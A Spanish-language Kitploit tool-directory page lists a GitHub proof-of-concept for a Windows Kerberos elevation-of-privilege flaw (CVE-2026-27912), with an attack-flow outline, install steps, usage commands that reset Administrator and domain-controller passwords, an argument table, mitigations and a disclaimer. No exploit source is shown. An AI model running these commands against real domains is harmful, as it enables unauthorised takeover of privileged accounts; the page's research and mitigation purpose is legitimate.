Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Kerberos-CVE-2026-27912 — PoC para CVE-2026-27912 - Windows Kerberos Elevation of Privilege (ResetNightmare). Restablecimiento de contraseña no autorizado mediante una falla de Kerberos. Solo para investigación de seguridad. | Kitploit
Herramientas/GitHubGitHub/oxstussz-eng/kerberos-cve-2026-27912
Autenticación y AutorizaciónEscalada de PrivilegiosAtaques de ContraseñasExplotaciónPruebas de Penetración
GitHuboxstussz-eng/kerberos-cve-2026-27912

Kerberos-CVE-2026-27912

PoC para CVE-2026-27912 - Windows Kerberos Elevation of Privilege (ResetNightmare). Restablecimiento de contraseña no autorizado mediante una falla de Kerberos. Solo para investigación de seguridad.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 5 díasAún no revisado

Kerberos-CVE-2026-27912

CVE-2026-27912 - Vulnerabilidad de elevación de privilegios de Windows Kerberos

ResetNightmare - Restablecimiento de contraseña no autorizado mediante una falla en el protocolo de cambio de contraseña de Kerberos.


📋 Detalles

CampoValor
CVECVE-2026-27912
TítuloVulnerabilidad de elevación de privilegios de Windows Kerberos
CVSS8.0 ALTA (CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
CWECWE-285: Autorización inadecuada
Publicado14 de abril de 2026
CorregidoAbril de 2026

🔍 Flujo de Ataque

root@kitploit:~
1. Attacker has/creates account with UPN write permissions
2. Sets fake UPN to target's sAMAccountName
3. Requests TGT with NT-ENTERPRISE name type
4. Clears their own UPN
5. Uses TGT to reset target's password
6. Verifies password change success

📦 Requisitos

  • Windows con PowerShell
  • Módulo de ActiveDirectory (Install-WindowsFeature RSAT-AD-PowerShell)
  • Rubeus.exe (descargar desde GhostPack/Rubeus)
  • Acceso de red al controlador de dominio

🚀 Instalación

root@kitploit:~
# Clone repository
git clone https://github.com/oxstussz-eng/Kerberos-CVE-2026-27912.git
cd Kerberos-CVE-2026-27912

# Install dependencies
pip install -r requirements.txt

💻 Uso

Ataque básico

root@kitploit:~
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass

Cuenta de equipo objetivo

root@kitploit:~
python resetnightmare.py -t DC01$ -p NewPass123 -u AttackUser -up AttackPass -c

Crear nueva cuenta

root@kitploit:~
python resetnightmare.py -t Admin -p NewPass -u NewUser -up Pass -path "OU=Temp,DC=domain,DC=local"

Modo detallado

root@kitploit:~
python resetnightmare.py -t Administrator -p NewPass123 -u AttackUser -up AttackPass -v

📊 Argumentos


🛡️ Mitigación

  1. Aplicar el parche oficial de la actualización de seguridad de Microsoft
  2. Segmentar la red para limitar el acceso a redes adyacentes
  3. Aplicar el principio de privilegio mínimo - restringir los permisos de escritura de UPN
  4. Supervisar cambios sospechosos de UPN y restablecimientos de contraseña

⚠️ Descargo de responsabilidad

Solo para pruebas de seguridad autorizadas e investigación educativa.

El acceso no autorizado a los sistemas informáticos es ilegal. El autor no asume ninguna responsabilidad por el mal uso de este software.


📚 Referencias

  • NVD: CVE-2026-27912
  • Guía de actualizaciones de seguridad de Microsoft

👨‍💻 Autor

n0vax1337 / Investigador de Seguridad


📄 Licencia

Licencia MIT - ver LICENSE


Última actualización: 2026

Descargar herramienta
FlagDescripciónPor defecto
-t / --targetNombre de la cuenta objetivorequerido
-p / --new-passwordNueva contraseña para la cuenta objetivorequerido
-u / --upn-userCuenta en la que se establecerá un UPN falsorequerido
-up / --upn-passwordContraseña para la cuenta UPNrequerido
-c / --computerUPNUser es una cuenta de equipoflag
-r / --rubeus-pathRuta a Rubeus.exeRubeus.exe
-e / --encryptionTipo de cifrado admitidoAES256
-path / --create-pathRuta OU para crear la nueva cuenta""
-d / --dcNombre del controlador de dominiodetección automática
-v / --verboseSalida detalladaflag